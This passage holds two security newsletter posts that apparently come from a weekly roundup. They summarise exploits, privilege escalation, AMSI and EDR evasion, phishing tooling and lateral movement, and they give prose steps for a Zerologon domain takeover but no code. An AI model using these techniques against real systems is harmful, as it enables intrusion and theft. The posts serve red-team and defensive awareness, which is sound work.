  • Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472). A holdover feature from Windows NT that allows computer accounts to authenticate to a Domain Controller via NetLogon and uses AES-CFB8 with a zero'd IV means that 1/256 attempts with a zero'd client challenge (attacker controlled) will result in a session key of all zeros. Since computer accounts don't get locked out, an attacker can authenticate to your Domain Controller as the Domain Controller computer account in under 256 tries. From there, a password reset can be issued and all hashes dumped. With these hashes, a pass-the-hash (or golden ticket) can be used to log back into the DC and reset its computer password back to whatever it was before the attack. This is the worst bug since MS17-010 aka ETERNALBLUE and I predict it will be used in all types of attacks but ransomware just got an "easy button" for complete domain compromise. This is a drop-everything-and-patch scenario. Multiple PoCs exist (this one is the best). A Sigma rule is also available (requires registration with SOCPrime but the rule is free).
  • WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day. The ability to intercept WSUS locally, and add a certificate to the current user's local store means that arbitrary Microsoft signed (psexec) binaries can be run as SYSTEM by any user. Tool release coming in less than 30 days.
  • Evilginx 2.4 - Gone Phishing. Evilginx is an amazing tool for phishing assessments, and it just got better. Kuba added a bunch of neat new features like pre-load pages and IP blacklisting. Be sure to update and try them out!
  • snuffy is a simple command line tool to dump the data sent and received by programs that use OpenSSL. Here is an example of dumping data from Zoom.
  • SRC-2020-0019 : Microsoft Exchange Server DlpUtils AddTenantDlpPolicy Remote Code Execution Vulnerability. This is an authenticated RCE against Exchange servers that allows any authenticated user to execute code as SYSTEM! Both HTTPS and Ps-Remoting PoCs are available - patch now!
  • Windows: CloudExperienceHostBroker Unsafe COM Object EoP. COM objects with bad access control lists (ACLs) lead to the ability to add a user as an Administrator from any account. C# PoC here.
  • twistrs is a domain name permutation and enumeration library powered by Rust. It most cases it has better coverage and is much faster than dnstwist. Blog post here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • DumpsterDiver is a tool, which can analyze big volumes of data in search of hardcoded secrets like keys (e.g. AWS Access Key, Azure Share Key or SSH keys) or passwords. Additionally, it allows creating a simple search rules with basic conditions (e.g. report only csv files including at least 10 email addresses).

This post is cross-posted on SIXGEN's blog.

βœ‡Bad Sector Labs Blog

Last Week in Security (LWiS) - 2020-09-21

By: Erik β€”

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-14 to 2020-09-21.

News

Techniques

  • Aruba Clearpass RCE (CVE-2020-7115). Argument injection is an under appreciated bug class, but it is more powerful and more widespread than most researchers realize. In this case Daniel uses some nifty tricks to get a root reverse shell.
  • Building a custom Mimikatz binary shows how red teamers can take open source tools, and modify the source code to bypass most static detections. You'll have to do some more work for advanced EDR detections based on dynamic or behavioral analysis.
  • Are You Docking Kidding Me?. In this post, Leo Pitt shows the macOS equivalent of using LNK files on Windows to persist in the Dock on macOS. The post ends with a very thorough detection section.
  • Beacon Object File ADVENTURES: Some Zerologon, SMBGhost, and Situational Awareness. Beacon object files (BOFs) are a new capability in Cobalt Strike that allow for compiled code to run in the context of a beacon. This post introduces two exploits and a bunch of situational awareness BOFs to get you started.
  • Implementing Direct Syscalls Using Hell’s Gate. Instead of baking your syscall numbers into your binary (and having to keep a list of them for every OS), use the Hell's Gate technique (LWiS 2020-06-08) to determine them dynamically. PoC here.
  • MacOS Injection via Third-Party Frameworks. This is some great macOS research by Adam Chester that shows how apps that use debugging pipes (like Fiddler or VSCode) for injection as well as Electron apps for Transparency, Consent, and Control (TCC) bypass/obfuscation.
  • MemFuck: Bypassing User-Mode Hooks. Sometimes you want to remove ALL the usermode hooks from your process by unmapping everything you can. In that case this project is for you - it uses some really interesting tricks to unmap DLLs and then use direct syscalls. PoC here.
  • I Like to Move It: Windows Lateral Movement Part 2 – DCOM. Dominic Chell shows how DCOM can be used for lateral movement in a Windows network, including using Excel 4 macros for lateral movement.

Tools and Exploits

  • DLLsForHackers generates Dlls that can be used for side loading and other attack vectors. This Dll will (maybe) not cause deadlock since it only use functions that are DllMain safe (unlike many other tools/DLL hijacking techniques). For a potentially more mature tool, see Koppeling.
  • tmpmail is a command line utility that allows you to create a temporary email address and receive emails to the temporary email address. It uses 1secmail's API to receive emails. Prefer python? pydispo has you covered.
  • AMSI.fail is a C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process. Check out the live site: www.amsi.fail.
  • sshiva is a C# application that allows you to run SSH commands against a host or list of hosts.
  • DiscerningFinch collects an array of OS specific string constants and then attempts to use those to brute-force decrypt the inner binary. If it succeeds it loads the inner binary into memory passing along any command line arguments that may exists. If it fails, it prints out a .NET-looking error message as feedback.
  • Firefox for Android LAN-Based Intent Triggering. The SSDP engine in Firefox for Android (68.11.0 and below) can be tricked into triggering Android intent URIs with zero user interaction. This attack can be leveraged by attackers on the same WiFi network and manifests as applications on the target device suddenly launching, without the users' permission, and conducting activities allowed by the intent. Demo here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • HTTP Toolkit is a cross platform, open source, HTTP MitM proxy. This looks super powerful, and easy to use. For HTTP request monitoring and modification, this looks easier to use than Burp Suite.
  • MoveScheduler focuses on lateral movement via several different methods of scheduling tasks: Win32_ScheduledJob (C#), Win32_Scheduledjob (PowerShell), TaskScheduler Library, and PS_ScheduleTask.

This post is cross-posted on SIXGEN's blog.

❌